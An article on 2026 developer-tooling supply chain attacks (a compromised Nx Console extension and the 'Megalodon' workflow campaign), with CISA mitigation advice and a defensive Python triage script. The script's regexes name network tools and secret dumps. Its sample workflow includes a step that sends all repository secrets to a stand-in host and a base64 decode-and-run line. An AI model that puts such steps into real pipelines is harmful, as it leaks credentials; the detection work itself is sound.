A series of supply chain attacks has put millions of software developers on alert. The attacks turn everyday developer tooling against its users to steal credentials, cloud tokens, and source code, and they do so by abusing components that developers implicitly trust.
Developer Tools: A New Target for Cyber Threats
What makes these campaigns alarming is that they abuse systems developers inherently trust: code editors, automated build pipelines, and version control workflows. In some cases the malware reaches and executes on a developer's machine with no user interaction at all.
Two interconnected campaigns exemplify the threat. The first involved a compromised release of the popular Nx Console VS Code extension, version 18.95.0, which was distributed through the Visual Studio Code Marketplace on May 18, 2026. Because the extension has over 2.2 million installations, the impact was immediate and widespread, and it included unauthorized access to approximately 3,800 internal GitHub repositories.
CISA’s Response to the Supply Chain Attacks
The Cybersecurity and Infrastructure Security Agency (CISA) has been instrumental in establishing the scope of these threats. On May 28, 2026, CISA issued an urgent alert highlighting the targeting of CI/CD pipelines, editor extensions, and cloud environments. The malicious extension has been assigned CVE-2026-48027 and added to CISA's Known Exploited Vulnerabilities (KEV) catalog.
Organizations that installed the compromised version are advised to treat every machine it ran on as fully compromised, since the extension executed with the full privileges of the developer's account. CISA recommends a thorough audit of workflow files and a complete forensic review of CI/CD logs and cloud audit trails for any affected entity.
Insight into the Megalodon Campaign
The second campaign, dubbed "Megalodon," ran concurrently. Within a six-hour window the attackers pushed 5,718 malicious commits to 5,561 public GitHub repositories. The commits added GitHub Actions workflows that, when they ran, harvested CI/CD secrets, cloud credentials, and SSH keys from the build environment.
The attackers' initial foothold was a stolen GitHub personal access token belonging to a contributor. With it they planted a hidden orphan commit in the nrwl/nx GitHub repository containing a 498 KB obfuscated JavaScript payload. An orphan commit is reachable from no branch or tag, so it does not appear in the repository's history or in a normal clone, yet GitHub still serves it by its commit hash; the payload could therefore be fetched by URL without ever showing up in a diff or pull request. The attackers then published the malicious extension to the VS Code Marketplace using stolen publishing credentials.
Once installed, the compromised extension silently executed the payload, which harvested credentials and, on macOS, installed a Python backdoor. Because the activity originated from a trusted, signed editor extension, standard endpoint security controls had difficulty detecting it.
Mitigation and Future Outlook
In response to these threats, CISA advises organizations to audit their systems for suspicious activity, in particular changes made after May 18, 2026 by automated accounts, to review CI/CD logs and cloud audit trails in full, and to rotate all access credentials. Rotation should cover everything the extension or a poisoned workflow could have read: repository and organization secrets, cloud access keys, SSH keys, and personal access tokens.
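As an added example (not code from this article, CISA, GitHub, or the Nx project), here are the two triage checks the advisory calls for, written in Python against constructed sample input: a scan of GitHub Actions workflow files for steps that can leak secrets, and a filter over git history for commits made on or after the cut-off date by automated-looking accounts. The indicator patterns, the bot-author regex, and the sample workflow and log lines are this example's own assumptions, not artifacts recovered from the incident.

```python
"""Triage helpers for the CI/CD abuse described in this article.
Added example, not code from the article, CISA, GitHub or the Nx project.

  scan_workflow()      - flags GitHub Actions steps that can leak secrets
  suspicious_commits() - filters `git log` output for post-cut-off commits
                         made by automated-looking accounts

The indicator patterns are this example's own assumptions about what a
credential-harvesting workflow tends to contain, not signatures from the
incident.
"""
import re
from datetime import date

# A step that makes an outbound request while holding secrets or an
# environment dump deserves a human look.  Assumed heuristics.
NET_CALL = re.compile(r"\b(curl|wget|nc|Invoke-WebRequest)\b", re.I)
SECRET_REF = re.compile(
    r"toJSON\(\s*secrets\s*\)|\$\{\{\s*secrets\.|\bprintenv\b|/proc/self/environ",
    re.I,
)
# Inline base64 blob piped into a shell, or eval of a command substitution.
DECODE_EXEC = re.compile(
    r"base64\s+(-d|--decode)[^\n]*\|\s*(ba)?sh\b|\beval\s*\$\(", re.I
)
# Untrusted PR code run with a write token: pull_request_target + head checkout.
PR_TARGET = re.compile(r"^[ \t]*pull_request_target\s*:", re.M)
PR_HEAD_CHECKOUT = re.compile(r"github\.event\.pull_request\.head\.(sha|ref)")
# A step starts at a list item whose first key is one of the usual step keys.
STEP_START = re.compile(r"^[ \t]*-[ \t]+(name|uses|run|id|with|env|if|shell):", re.M)


def steps(text):
    """Yield (1-based start line, step text) for each step in a workflow.
    Line-based split so the example needs no YAML library; good enough for
    triage, not a parser."""
    starts = [m.start() for m in STEP_START.finditer(text)]
    for i, s in enumerate(starts):
        end = starts[i + 1] if i + 1 < len(starts) else len(text)
        yield text.count("\n", 0, s) + 1, text[s:end]


def scan_workflow(text):
    """Return [(line, reason)] findings for the contents of one workflow file."""
    findings = []
    m = PR_TARGET.search(text)
    if m and PR_HEAD_CHECKOUT.search(text):
        findings.append((text.count("\n", 0, m.start()) + 1,
                         "pull_request_target checks out the PR head: untrusted "
                         "code runs with a write token and repository secrets"))
    for line, step in steps(text):
        if DECODE_EXEC.search(step):
            findings.append((line, "step decodes and executes an inline payload"))
        if SECRET_REF.search(step) and NET_CALL.search(step):
            findings.append((line, "step exposes secrets and makes a network call"))
    return findings


# Assumed marker for automated committers; tune to your own bot identities.
BOT_AUTHOR = re.compile(r"\[bot\]|actions@github\.com", re.I)


def suspicious_commits(log_lines, since, author_re=BOT_AUTHOR):
    """Filter `git log --format='%H%x09%aI%x09%an <%ae>%x09%s'` output.
    Returns [(short sha, author, subject)] for commits authored on or after
    `since` (a date or an ISO date string) by an author matching author_re."""
    if isinstance(since, str):
        since = date.fromisoformat(since)
    hits = []
    for raw in log_lines:
        sha, when, author, subject = raw.rstrip("\n").split("\t", 3)
        if date.fromisoformat(when[:10]) >= since and author_re.search(author):
            hits.append((sha[:12], author, subject))
    return hits


# Constructed sample workflow (not from the incident): a PR-head checkout
# under pull_request_target, one exfiltration step, one decode-and-run step.
SAMPLE_WORKFLOW = """\
name: ci
on:
  pull_request_target:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - name: build
        run: npm ci && npm test
      - name: telemetry
        env:
          ALL: ${{ toJSON(secrets) }}
        run: |
          curl -s -X POST -d "$ALL" https://example.invalid/collect
      - name: setup
        run: echo aGVsbG8K | base64 -d | sh
"""

# Constructed `git log` lines in the format documented above.
SAMPLE_GIT_LOG = [
    "0f1e2d3c4b5a69788796a5b4c3d2e1f00f1e2d3c\t2026-05-17T09:12:00+00:00\tAlice Dev <alice@example.com>\tfix typo",
    "9a8b7c6d5e4f30211203f4e5d6c7b8a99a8b7c6d\t2026-05-19T03:40:11+00:00\tgithub-actions[bot] <actions@github.com>\tci: add telemetry workflow",
    "1234567890abcdef1234567890abcdef12345678\t2026-05-20T14:05:00+00:00\tBob Dev <bob@example.com>\tbump deps",
]

if __name__ == "__main__":
    for line, reason in scan_workflow(SAMPLE_WORKFLOW):
        print(f"workflow line {line}: {reason}")
    for sha, author, subject in suspicious_commits(SAMPLE_GIT_LOG, "2026-05-18"):
        print(f"commit {sha} by {author}: {subject}")
```

Feed real input by reading each file under .github/workflows into scan_workflow and by piping git log --format='%H%x09%aI%x09%an <%ae>%x09%s' into suspicious_commits. Treat the output as a review queue rather than a verdict: a legitimate step that publishes to a package registry with a scoped token also matches the secrets-plus-network rule, and the point of the exercise is to put every such step in front of a reviewer after the cut-off date.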
As attacks on software delivery pipelines become more common, organizations need to harden the pipeline itself rather than rely on patching alone: review and pin editor extensions and CI actions, scope tokens to the least privilege a job actually needs, treat workflow changes as code that requires review, and keep systems up to date.
